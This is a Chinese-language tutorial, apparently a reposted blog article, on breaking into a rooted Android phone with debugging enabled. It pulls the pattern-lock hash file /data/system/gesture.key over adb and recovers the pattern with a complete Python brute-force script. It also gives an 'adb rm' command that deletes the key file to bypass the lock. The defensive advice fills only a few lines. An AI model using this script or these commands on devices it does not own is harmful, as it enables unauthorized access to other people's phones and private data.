破解android手機圖形鎖


     安卓手機的圖形鎖包括3*3,4*4,5*5的點陣,按次序連接數個點從而達到鎖定/解鎖的功能。以3*3為例,最少需要連接4個點,最多能連接9個點。在我們進行繪制圖形的過程中,每選中這9個點中的一個點,實際上就代表選中了一位數字。當我們連接完4個點時,產生的圖形也會間接生成一組密碼。比如我們選中02、04、05、08這四個點位,那么組成的密碼即為02040508。當然,為了安全,生成的密碼是不可能直接被存儲的,於是安卓系統將02040508轉換為16進制並以sha1加密,並存儲在手機里的/data/system/gesture.key 文件中。我們要做的就是破解這個文件中保存的密鑰,通過破解出的密鑰可以得到繪制圖形的點位,從而進入手機系統。

破解有兩個前提條件:

(1)手機需要root;

(2)需要開啟調試模式。

滿足了以上兩個條件,我們便可以開始對安卓手機的圖形密碼進行破解。

首先利用adb進入手機的shell模式。然后adb pull data/system/gesture.key gesture.key。將密鑰存放的文件拷貝到電腦。利用C32Asm打開gesture.key文件,會發現其文件內容為sha1加密。如圖1所示: 

圖1

因為該密鑰是基於點位組成的密碼,將sha1密鑰解密后的密碼應該是大於4位小於9位的。密碼數量大概在3024~985824之間。既然密碼的數量已經知道,我們便可以對該密碼進行窮舉破解。

利用python編寫窮舉破解程序:

主要編程思路如下:首先對00-09這些數字進行排列組合,需要用到Python中的itertools模塊,來完成迭代循環操作。組合出來的數字序列在用hashlib模塊對字符串進行SHA1加密,然后對gesture.key文件中的密鑰進行碰撞,知道找到相同的一組數字序列。

代碼:

 1 #coding:utf-8
 2 import itertools
 3 import hashlib
 4 import time
 5 import os
 6 #調用cmd,ADB連接到手機,讀取SHA1加密后的字符串
 7 #os.system(r"adb pull /data/system/gesture.key gesture.key")
 8 time.sleep(5)
 9 f=open('gesture.key','r')
10 pswd=f.readline()
11 f.close()
12 pswd_hex=pswd.encode('hex')
13 print u'加密后的密碼為:%s'%pswd_hex
14 #生成解鎖序列,得到['00','01','02','03','04','05','06','07','08']
15 matrix=[] 
16 for i in range(0,9):
17     str_temp = '0'+str(i)
18     matrix.append(str_temp)
19 #將00——08的字符進行排列,至少取4個數排列,最多全部進行排列
20 min_num=4
21 max_num=len(matrix)
22 list_m=[]
23 for num in range(min_num,max_num+1):#從04 -> 08
24     iter1 = itertools.permutations(matrix,num)#從9個數字中挑出n個進行排列
25     list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中
26 
27 for i in list_m:
28     for el in i:#遍歷這n個數字的全部排列
29         strlist=''.join(el)#將list轉換成str。[00,03,06,07,08]-->0003060708
30         #print strlist
31         strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進行SHA1加密
32         if pswd_hex==strlist_sha1:#將手機文件里的字符串與加密字符串進行對比
33             print u'解鎖密碼為:',strlist

當腳本運行完成后,便會輸出圖形序列的密碼,按照0001020406的排列順序,繪制相應的圖形便可進入手機。 


通過這種方式獲取手機權限的限制還是比較多的,首先手機必須是已經root的最高權限,並且開啟了開發者調試模式。

防止以上攻擊方法的防御措施就是關閉開發者調試模式,手機被盜后可以禁止其他人對手機ADB調試破解密碼。另外也要防止木馬被植入手機,因為通過木馬也可以導出手機中的gesture.key密鑰管理文件。

另外,從破解目的來說,如果單單是忘記了自己的手機圖形鎖密碼,完全可以用更簡單的辦法:ADB連接手機,然后“adb rm /data/system/gesture.key”刪除掉gesture.key文件,此時圖形鎖就失效了,隨意畫一下就能解鎖。

參考文章:http://www.jb51.net/softjc/295236.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM